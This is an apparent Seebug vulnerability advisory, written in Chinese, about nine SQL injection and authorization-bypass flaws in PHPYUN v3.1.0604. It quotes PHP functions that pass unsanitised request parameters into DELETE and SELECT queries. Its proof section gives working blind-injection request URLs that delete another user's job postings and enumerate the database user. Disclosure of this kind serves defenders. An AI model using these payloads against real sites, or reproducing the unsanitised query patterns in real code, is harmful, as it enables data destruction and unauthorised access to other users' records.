PHPYUN最新版多处SQL注入及越权操作

2014-06-10T00:00:00
ID SSV:93929
Type seebug
Reporter Root
Modified 2014-06-10T00:00:00

Description

简要描述:

PHPYUN最新版(phpyun_v3.1.0604_gbk)多处SQL注入及越权操作 这里一共存在九处SQL注入及越权操作!!!

详细说明:

这里一共存在九处SQL注入及越权操作!!! 文件/member/model/com.class.php 第一处SQL注入、越权删除职位信息:

function job(){ ...... if($_GET['del'] || is_array($_POST['checkboxid'])){ if(is_array($_POST['checkboxid'])){ $layer_type=1; $delid=@implode(",",$_POST['checkboxid']); }else if($_GET['del']){ $layer_type=0; $delid=$_GET['del']; } $nid=$this->obj->DB_delete_all("company_job","`id` in (".$delid.") and `uid`='".$this->uid."'"," "); if($nid){ $rows=$this->obj->DB_select_all("company_job","`id` in (".$delid.") and `r_status`<>'2'","`state`"); if(is_array($rows)){ $status0=$status1=$status2=$status3=0; foreach($rows as $v){ if($v['state']=="0"){ $status0=$status0+1; }elseif($v['state']=="1"){ $status1=$status1+1; }elseif($v['state']=="2"){ $status2=$status2+1; }elseif($v['state']=="3"){ $status3=$status3+1; } } $num=count($rows); $value.="`status0`=`status0`-$status0,"; $value.="`status1`=`status1`-$status1,"; $value.="`status2`=`status2`-$status2,"; $value.="`status3`=`status3`-$status3,"; $value.="`job`=`job`-$num"; $this->obj->DB_update_all("company_statis",$value,"uid='".$this->uid."'"); } $newest=$this->obj->DB_select_once("company_job","`uid`='".$this->uid."' order by lastupdate DESC","`lastupdate`"); $this->obj->update_once("company",array("jobtime"=>$newest['lastupdate']),array("uid"=>$this->uid)); $this->layer_msg('删除成功!',9,$layer_type,$_SERVER['HTTP_REFERER']); }else{$this->layer_msg('删除失败!',8,$layer_type,$_SERVER['HTTP_REFERER']);} }

这里的$delid=$_GET['del']; 没有经过任何保护直接进入:DB_delete_all和DB_select_all 跟进DB_delete_all函数:

function DB_delete_all($tablename, $where, $limit = 'limit 1'){ $SQL = "DELETE FROM `" . $this->def . $tablename . "` WHERE $where $limit"; $this->db->query("set `sql_mode`=''"); return $this->db->query($SQL);

这里也没有处理,导致SQL注入 而且这里可以通过截断后面的:and uid='".$this->uid."'",修改uid的值,uid为用户的用户id,这样就可以越权操作,删除任意用户的职位信息了。 第二处SQL注入、越权删除用户系统信息:

function sysnews_action(){ if ($_POST['del']||$_GET['del']){ if(is_array($_POST['del'])){ $ids=@implode(',',$_POST['del']); $layer_type='1'; }else if($_GET['del']){ $ids=$_GET['del']; $layer_type='0'; } $nid=$this->obj->DB_delete_all("sysmsg","`id` in(".$ids.") AND `fa_uid`='".$this->uid."'"," "); $nid?$this->layer_msg('删除成功!',9,$layer_type):$this->layer_msg('删除失败!',8,$layer_type); } $urlarr=array("c"=>"sysnews","page"=>"{{page}}"); $pageurl=$this->url("index","index",$urlarr); $this->get_page("sysmsg","`fa_uid`='".$this->uid."' order by id desc",$pageurl,"10"); $this->public_action(); $this->yunset("js_def",7); $this->com_tpl('sysnews'); }

这里的$ids=$_GET['del']; 没有经过任何保护进入了DB_delete_all函数,导致SQL注入 由于这里的fa_uid就是此用户的uder id,这里我们通过截断后面的fa_uid,修改fa_uid为任意用户的id,就可以通过越权操作,删除任意用户的系统信息了。 第三、四、五、六处SQL注入、越权操作:

function hr_action() { if($_POST['ajax']==1 && $_POST['ids']) { $this->obj->DB_update_all("userid_job","`is_browse`='2'","`id` in (".@implode(",",$_POST['ids']).") and `com_id`='".$this->uid."'");die;//第三处ids存在注入; } if($_POST['delid']||$_GET['delid']){ if(is_array($_POST['delid'])){ $id=@implode(",",$_POST['delid']); $layer_type='1'; }else{ $id=$_GET['delid']; $layer_type='0'; } $sq_num = $this->obj->DB_select_all("userid_job","`id` in (".$id.") and `com_id`='".$this->uid."'","`uid`");//第四处id=delid存在注入; if(is_array($sq_num)){ foreach($sq_num as $v){ $a[]=$v['uid']; } } $user_id=@implode(",",$a); $data['sq_jobnum']="`sq_jobnum`"-count($sq_num); $this->obj->update_once("member_statis",$data,"uid in (".$user_id.")"); $nid=$this->obj->DB_delete_all("userid_job","`id` in (".$id.") and `com_id`='".$this->uid."'"," ");//第五处这里的id也存在注入; $nid?$this->layer_msg('删除成功!',9,$layer_type,"index.php?c=hr"):$this->layer_msg('删除失败!',8,$layer_type,"index.php?c=hr"); } if(!empty($_GET['keyword'])){ $rows=$this->obj->DB_select_all("resume","`name` like '%".$_GET['keyword']."%' and `r_status`<>'2'","`uid`"); if(is_array($rows) && !empty($rows)){ foreach($rows as $v){ $uidarr[]=$v['uid']; } $urlarr['keyword']=$_GET['keyword']; $where=" uid in (".@implode(',',$uidarr).") and "; } } if($_GET['job_id']){ $where ="job_id=".$_GET['job_id']." and "; $urlarr['job_id']=$_GET['job_id']; } $this->public_action(); $urlarr['c']="hr"; $urlarr['page']="{{page}}"; $pageurl=$this->url("index","index",$urlarr); $rows=$this->get_page("userid_job",$where." `com_id`='".$this->uid."'",$pageurl,"10");//第六处这里的job_id进入where存在注入 if(is_array($rows) && !empty($rows)) { foreach($rows as $v) { $uid[]=$v['uid']; } $userrows=$this->obj->DB_select_all("resume","`uid` in (".@implode(",",$uid).") and `r_status`<>'2'","`name`,`sex`,`edu`,`uid`"); if(is_array($userrows)) { include(PLUS_PATH."user.cache.php"); foreach($rows as $k=>$v) { foreach($userrows as $val) { if($v['uid']==$val['uid']) { $rows[$k]['name']=$val['name']; $rows[$k]['sex']=$userclass_name[$val['sex']]; $rows[$k]['edu']=$userclass_name[$val['edu']]; } } } } } $this->yunset("rows",$rows); $this->company_satic(); $this->yunset("js_def",5); $this->com_tpl('hr'); }

上面的注入点都已经表名,见后面的漏洞证明,证明漏洞存在 第七处SQL注入、越权删除黑名单

function blacklist_action() { if($_POST['delid']){ if(is_array($_POST['delid'])){ $id=@implode(",",$_POST['delid']); $layer_type='1'; }else{ $layer_type='0'; } $id=@implode(",",$_POST['delid']); $nid=$this->obj->DB_delete_all("blacklist","`id` in (".$id.") and `c_uid`='".$this->uid."'"," "); $nid?$this->layer_msg('删除成功!',9,$layer_type,"index.php?c=blacklist"):$this->layer_msg('删除失败!',8,$layer_type,"index.php?c=blacklist"); }

这里的$id=@implode(",",$_POST['delid']); 没有经过保护直接进入了DB_delete_all,导致SQL注入,通过截断,修改uid可以删除任意用户的黑名单信息。 第八处SQL注入、越权删除用户邀请信息

function invite_action() { if($_POST['delid'] || $_GET['del']) { if($_GET['del']) { $id=$_GET['del']; $layer_type='0'; }else{ $id=@implode(",",$_POST['delid']); $layer_type='1'; } $nid=$this->obj->DB_delete_all("userid_msg","`id` in (".$id.") and `fid`='".$this->uid."'"," "); $nid?$this->layer_msg('删除成功!',9,$layer_type,"index.php?c=invite"):$this->layer_msg('删除失败!',8,$layer_type,"index.php?c=invite"); }

这里的$id=$_GET['del']; 没有经过保护直接进入了DB_delete_all,导致SQL注入,通过截断,修改uid可以删除任意用户的邀请信息。 第九处SQL注入、越权操作

function down_action() { if($_POST['delid'] || $_GET['del']) { if($_GET['del']) { $id=$_GET['del']; $layer_type='0'; }else{ $id=@implode(",",$_POST['delid']); $layer_type='1'; } $id=$_GET['del']?$_GET['del']:@implode(",",$_POST['delid']); $nid=$this->obj->DB_delete_all("down_resume","`id` in (".$id.") and `comid`='".$this->uid."'"," "); $nid?$this->layer_msg('删除成功!',9,$layer_type,"index.php?c=down"):$this->layer_msg('删除失败!',8,$layer_type,"index.php?c=down"); }

这里的$id=$_GET['del']?$_GET['del']:@implode(",",$_POST['delid']); 没有经过保护直接进入了DB_delete_all,导致SQL注入,通过截断,修改uid可以删除任意用户信息。

漏洞证明:

这里拿第一处SQL注入、越权删除职位信息为例: 两个企业用户: 攻击者:111111,uid=3,发布的职位信息id=2, 受害者:222222,uid=4,发布的职位信息id=4, 我们先来看看用户222222发布的职位信息:

<img src="https://images.seebug.org/upload/201406/101407393881f63bf5ab6171aa3e4d61491e5a68.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

然后用户111111发送请求: http://localhost/phpyun/member/index.php?c=job&del=if(substring(user(),1,1)=char(111),4,888))/**/and uid=4%23 将uid设置为受害者222222的uid=4

<img src="https://images.seebug.org/upload/201406/10141045b0e1bc5d65a43062f3f63906c1ff69d2.png" alt="2.png" width="600" onerror="javascript:errimg(this);">

这然后查看用户222222的发布职位信息,仍然存在,没有删除 修改char的值,继续发送请求: http://localhost/phpyun/member/index.php?c=job&del=if(substring(user(),1,1)=char(114),4,888))/**/and uid=4%23

<img src="https://images.seebug.org/upload/201406/10141218f8ccffa8d7af2ef4cc89db39547006a6.png" alt="3.png" width="600" onerror="javascript:errimg(this);">

此时在访问用户222222的发布职位信息时,职位信息已经被删除:

<img src="https://images.seebug.org/upload/201406/10141316b2cb1695e2a25780c4c394002eb304bd.png" alt="4.png" width="600" onerror="javascript:errimg(this);">

这列通过修改char的值,遍历得到user()=root 也通过设置uid为其他任意用户,导致越权操作,可删除其他用户的发布职位信息。